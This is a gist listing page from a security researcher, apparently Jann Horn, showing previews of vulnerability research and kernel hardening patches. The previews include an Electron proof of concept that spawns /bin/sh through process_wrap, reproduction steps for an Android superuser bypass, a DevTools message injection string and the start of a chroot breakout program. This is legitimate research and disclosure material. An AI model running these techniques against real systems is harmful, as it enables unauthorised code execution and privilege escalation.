Jann thejh
thejh
/ gist:3bac7b2c79cdaaf569c702d9080320ed
Created
October 25, 2016 19:28
old electron command exec
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var Process = process.binding('process_wrap').Process; | |
| var proc = new Process(); | |
| proc.onexit = function(a,b) {}; | |
| var env = process.env; | |
| var env_ = []; | |
| for (var key in env) env_.push(key+'='+env[key]); | |
| proc.spawn({file:'/bin/sh',args:['sh','-c','id > /tmp/owned'],cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]}); |
thejh
/ 0001-drivers-tty-add-protected_ttys-sysctl.patch
Created
August 24, 2016 23:58
some old tty hardening patches
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| From cd0bd8ae7e4afb8050657b73d65e3ddeccd44b9b Mon Sep 17 00:00:00 2001 | |
| From: Jann Horn <jann@thejh.net> | |
| Date: Sat, 12 Dec 2015 02:59:28 +0100 | |
| Subject: [PATCH] drivers/tty: add protected_ttys sysctl | |
| This new fs.protected_ttys sysctl can be set to 1 to require | |
| CAP_SYS_ADMIN for the TIOCSTI ioctl (which lets the caller | |
| push input back into the TTY and thereby fake input to other | |
| processes that read from the same TTY). |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var Process = process.binding('process_wrap').Process; | |
| var proc = new Process(); | |
| proc.onexit = function(a,b) {}; | |
| var env = process.env; | |
| var env_ = []; | |
| for (var key in env) env_.push(key+'='+env[key]); | |
| proc.spawn({file:'/bin/sh',args:['sh','-c','id > /tmp/owned'],cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]}); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Date: Sun, 28 Feb 2016 19:08:22 +0100 | |
| From: Jann Horn <jann@thejh.net> | |
| To: Brad Spengler <spender@grsecurity.net> | |
| Subject: GRKERNSEC_PTRACE_READEXEC bypasses | |
| Hi! | |
| While writing some new kernel documentation (not yet public, but will probably | |
| soon be under Documentation/security/ptrace_checks.txt), I noticed that | |
| GRKERNSEC_PTRACE_READEXEC has some issues. |
thejh
/ 0001-fs-allow-unprivileged-chroot.patch
Created
January 2, 2016 07:09
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| From 712e7f2f67476986498dd8f1db332a62852ebdf0 Mon Sep 17 00:00:00 2001 | |
| From: Jann Horn <jann@thejh.net> | |
| Date: Sat, 2 Jan 2016 08:09:19 +0100 | |
| Subject: [PATCH] fs: allow unprivileged chroot() | |
| Allow unprivileged processes to chroot() themselves, under the | |
| following conditions: | |
| - The caller must have set NO_NEW_PRIVS to prevent him from | |
| invoking setuid/setgid/setcap executables in the chroot that |
thejh
/ 0001-drivers-tty-require-read-access-for-controlling-term.patch
Created
September 3, 2015 08:46
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| From 7f1265b917aba4436653aa8e7bf90976b82b77ee Mon Sep 17 00:00:00 2001 | |
| From: Jann Horn <jann@thejh.net> | |
| Date: Fri, 14 Aug 2015 17:47:01 +0200 | |
| Subject: [PATCH] drivers/tty: require read access for controlling terminal | |
| This is mostly a hardening fix, given that write-only access to other | |
| users' ttys is usually only given through setgid tty executables. | |
| Signed-off-by: Jann Horn <jann@thejh.net> | |
| --- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://accounts.google.com/o/oauth2/auth?client_id=243086291405-p1p6s7gq8rtijh3g9cppo85rl5pf17gv.apps.googleusercontent.com&response_type=code&scope=openid%20email&redirect_uri=https://thejh.net/&state=security_token%3D138r5719ru3e1%26url%3Dhttps://thejh.net/&prompt=none |
thejh
/ gist:219deec09c3d99cfc9f2
Created
July 30, 2015 02:56
ooold superuser vuln, reported to chainsdd 2012-08-13
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@android:/ # su 1000 | |
| system@android:/ $ cd /tmp | |
| system@android:/tmp $ cat > foo | |
| /system/bin/sh | |
| 1 | |
| rubbish | |
| system@android:/tmp $ su -c "$(cat foo)" | |
| # press "deny" now with "remember" option activated | |
| Permission denied | |
| 1|system@android:/tmp $ su |
thejh
/ gist:ba5289fec663878d6d2d
Created
July 14, 2015 12:50
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| zzzzDevToolsAPI.dispatchMessage({"method":"Network.responseReceived","params":{"requestId":"1191.4","frameId":"1191.1","loaderId":"1191.3","timestamp":125386.24326,"type":"Document","response":{"url":"http://thejh.net/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAthisisaneviltest","status":404,"statusText":"Not Found","headers":{"Date":"Tue, 14 Jul 2015 12:48:11 GMT","Cache-Control":"no-transform","Server":"lighttpd/1.4.35","Content-Length":"345","Content-Type":"text/html"},"mimeType":"text/html","connectionReused":false,"connectionId":21596,"encodedDataLength":-1,"fromDiskCache":false,"fromServiceWorker":false,"timing":{"requestTime":125386.186667,"proxyStart":-1,"proxyEnd":-1,"dnsStart":2.04599999415223,"dnsEnd":2.06400000024587,"connectStart":2.06400000024587,"connectEnd":29.9769999983255,"sslStart":-1,"sslEnd":-1,"serviceWorkerFetchStart":-1,"serviceWorkerFetchReady":-1,"serviceWorkerFetchEnd":-1,"sendStart":30.19000000 |
thejh
/ breakout_assisted.c
Created
July 13, 2015 20:58
chroot_breakout: uses two cooperating processes in different chroots
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define _GNU_SOURCE | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <unistd.h> | |
| #include <fcntl.h> | |
| #include <sys/socket.h> | |
| #include <sys/un.h> | |
| #include <sys/types.h> | |
| #include <sys/stat.h> |